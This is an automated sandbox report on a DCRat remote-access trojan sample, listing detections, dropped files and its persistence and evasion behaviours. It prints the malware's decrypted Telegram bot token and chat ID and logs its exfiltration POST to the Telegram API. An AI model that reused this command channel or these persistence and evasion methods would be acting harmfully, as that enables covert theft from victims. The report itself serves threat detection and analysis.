Windows Analysis Report
H9gMIu2HXi.exe

Overview

General Information

Sample name: H9gMIu2HXi.exe
renamed because original name is a hash value
Original sample name: 4fb1d8f8dff638f2c9b382f9552b18e2.bin.exe
Analysis ID: 1417539
MD5: 4fb1d8f8dff638f2c9b382f9552b18e2
SHA1: 5bc4dbad7914ceb72dba45d1b1efffba40143653
SHA256: b706a1a67f20b5e029c058de6a1e681a36fea762f69b9d983921d0e47ec2bc6c
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\BudDliLc.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\LdxTVLQK.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\MFrsFgjH.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Recovery\winlogon.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\vybNluDs.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe ReversingLabs: Detection: 70%
Source: C:\Recovery\winlogon.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Virustotal: Detection: 19% Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Virustotal: Detection: 58% Perma Link
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\BudDliLc.log Virustotal: Detection: 19% Perma Link
Source: C:\Users\user\Desktop\LdxTVLQK.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\LdxTVLQK.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\MFrsFgjH.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\MFrsFgjH.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\RAtJMMZA.log Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\Desktop\TDfrhvdw.log Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\Desktop\WslZMRrk.log Virustotal: Detection: 25% Perma Link
Source: C:\Users\user\Desktop\aEtIhTbg.log Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\Desktop\tRVOBpwv.log Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\Desktop\tnEMlbYs.log Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for submitted file
Source: H9gMIu2HXi.exe Virustotal: Detection: 60% Perma Link
Source: H9gMIu2HXi.exe ReversingLabs: Detection: 42%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\tRVOBpwv.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\tnEMlbYs.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aEtIhTbg.log Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Joe Sandbox ML: detected
Source: C:\Recovery\winlogon.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TDfrhvdw.log Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6770966847","bottoken":"7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o","settings":" !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"}}
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2","0","xworm","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Uses 32bit PE files
Source: H9gMIu2HXi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7 Jump to behavior
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: H9gMIu2HXi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_0031BA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_0032D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0072A69B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0073C220
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.79.128:80
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: unknown HTTP traffic detected: POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"Host: api.telegram.orgContent-Length: 98588Expect: 100-continueConnection: Keep-Alive
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000033D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000379A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.00000000029C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://api.telegram.org/bot
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhotoX
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003349000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://ipinfo.io/country
Source: SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003051000.00000004.00000800.00020000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734323133.0000000002E02000.00000002.00000001.01000000.00000000.sdmp, SurrogatewebSession.exe, 00000008.00000002.1734602264.000000000377C000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002729000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002613000.00000004.00000800.00020000.00000000.sdmp, winlogon.exe, 0000002B.00000002.1913984695.0000000002740000.00000004.00000800.00020000.00000000.sdmp, rGzNBWQu.log.43.dr, lKwWBiIK.log.8.dr String found in binary or memory: https://ipinfo.io/ip
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2

System Summary
barindex
.NET source code contains very large strings
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs Long String: Length: 157876
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs Long String: Length: 157876
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00A27AAF
Creates files inside the system directory
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
Deletes files inside the Windows folder
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP
Detected potential crypto function
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A292C6 0_2_00A292C6
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A35011 0_2_00A35011
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A462A8 0_2_00A462A8
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A35282 0_2_00A35282
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A302F7 0_2_00A302F7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A38253 0_2_00A38253
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A313FD 0_2_00A313FD
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A464D7 0_2_00A464D7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3742E 0_2_00A3742E
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A355B0 0_2_00A355B0
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4E600 0_2_00A4E600
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A307A7 0_2_00A307A7
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A388AF 0_2_00A388AF
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2D833 0_2_00A2D833
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2395A 0_2_00A2395A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A4EAAE 0_2_00A4EAAE
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A24A8E 0_2_00A24A8E
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A52BB4 0_2_00A52BB4
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A2FCCC 0_2_00A2FCCC
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A37DDC 0_2_00A37DDC
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A22EB6 0_2_00A22EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003192C6 3_2_003192C6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00325011 3_2_00325011
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00328253 3_2_00328253
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003362A8 3_2_003362A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00325282 3_2_00325282
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003202F7 3_2_003202F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003213FD 3_2_003213FD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032742E 3_2_0032742E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003364D7 3_2_003364D7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003255B0 3_2_003255B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0033E600 3_2_0033E600
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003207A7 3_2_003207A7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031D833 3_2_0031D833
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003288AF 3_2_003288AF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031395A 3_2_0031395A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0033EAAE 3_2_0033EAAE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00314A8E 3_2_00314A8E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00342BB4 3_2_00342BB4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0031FCCC 3_2_0031FCCC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00332D40 3_2_00332D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00327DDC 3_2_00327DDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_00312EB6 3_2_00312EB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072848E 4_2_0072848E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007240FE 4_2_007240FE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007300B7 4_2_007300B7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00734088 4_2_00734088
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00737153 4_2_00737153
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007451C9 4_2_007451C9
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007232F7 4_2_007232F7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007362CA 4_2_007362CA
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007343BF 4_2_007343BF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072F461 4_2_0072F461
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0074D440 4_2_0074D440
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072C426 4_2_0072C426
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007377EF 4_2_007377EF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072286B 4_2_0072286B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0074D8EE 4_2_0074D8EE
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_007519F4 4_2_007519F4
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072E9B7 4_2_0072E9B7
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00736CDC 4_2_00736CDC
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00733E0B 4_2_00733E0B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0072EFE2 4_2_0072EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_00744F9A 4_2_00744F9A
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8028 8_2_00007FFD9BAB8028
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABC425 8_2_00007FFD9BABC425
